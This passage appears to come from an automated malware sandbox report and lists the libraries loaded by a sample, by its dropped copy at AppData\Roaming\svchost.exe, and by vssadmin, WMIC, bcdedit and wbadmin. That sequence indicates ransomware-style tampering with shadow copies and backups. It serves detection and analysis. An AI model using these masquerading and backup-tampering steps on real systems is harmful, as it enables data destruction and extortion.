                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: dxgidebug.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\main.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: libffi-8.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: libcrypto-3.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: libssl-3.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: sqlite3.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: swprv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vss_ps.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: blb_ps.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: blb_ps.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vds_ps.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: vds_ps.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vds_ps.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsdyn.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsbas.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsvd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: hbaapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: wmiclnt.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: iscsidsc.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: iscsium.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fveapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
